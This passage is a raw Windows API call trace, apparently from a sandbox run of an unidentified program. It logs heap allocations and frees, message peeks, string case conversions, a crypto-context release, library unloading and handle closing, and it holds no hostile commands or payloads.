out: lpsz="A0200C03718") returned 0xb [0205.964] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0205.964] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0205.964] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0205.964] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0205.964] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0205.964] CryptReleaseContext (hProv=0xad28b8, dwFlags=0x0) returned 1 [0205.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0205.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9fc0 [0205.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0205.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0205.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0205.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0205.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0205.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0205.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0205.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0205.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0205.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0205.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0205.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0205.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0205.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0205.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0205.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0205.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0205.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0205.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0205.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0205.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0205.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0205.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0205.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0205.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0205.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0205.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0205.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0205.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0205.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0205.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0205.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0205.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0205.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0205.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0205.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0205.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0205.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0205.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0205.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0205.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0205.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0205.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0205.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0205.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0205.966] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0205.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0205.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0205.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0205.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0205.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0205.967] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0205.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0205.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0205.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1e8 [0205.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0205.967] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0205.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0205.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0205.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0205.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0205.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0205.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0205.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0205.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0205.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0205.968] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0205.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0205.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0205.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0205.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0205.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0205.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0205.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0205.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0205.968] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0205.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0205.968] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0205.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0205.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0205.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0205.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0205.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0205.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0205.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0205.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0205.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0205.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0205.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0205.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0205.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0205.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0205.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0205.969] FreeLibrary (hLibModule=0x74d40000) returned 1 [0205.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0205.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0205.969] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0205.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0205.969] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0205.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0205.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0205.970] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0205.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0205.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0205.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0205.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0205.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0205.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0205.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0205.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0205.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0205.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0205.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0205.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0205.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0205.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0205.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0205.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0205.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0205.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9fc0 [0205.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ff0 [0205.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1e8 [0205.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0205.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9648 [0205.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0205.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0205.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8a8 [0205.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0205.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0205.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0205.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0205.971] CloseHandle (hObject=0x2c4) returned 1 [0205.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0205.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0205.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0205.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0205.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0205.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0205.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0205.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0205.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0205.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0205.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0205.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0205.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0205.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0205.972] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0205.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0205.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0205.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0205.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0205.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0205.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0205.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0205.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0205.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0205.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0205.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0205.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0205.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0205.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0205.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0205.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0205.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0205.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9648 [0205.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1e8 [0205.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9b70 [0205.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0205.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9fc0 [0205.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0205.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0205.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8a8 [0205.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0205.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0205.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0205.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0205.974] CloseHandle (hObject=0x2c0) returned 1 [0205.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0205.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0205.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24c7a50 | out: hHeap=0x25c0000) returned 1 [0205.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0205.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0205.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0205.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0205.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0205.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0205.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0205.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0205.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0205.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0205.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0205.982] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0205.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0205.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0205.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0205.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0205.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0205.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0205.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0205.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0205.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0205.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0205.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0205.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0205.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0205.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0205.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0205.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0205.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0205.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0205.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0205.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0205.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0205.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0205.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0205.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0205.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0205.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0205.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0205.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0205.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0205.984] HeapFree 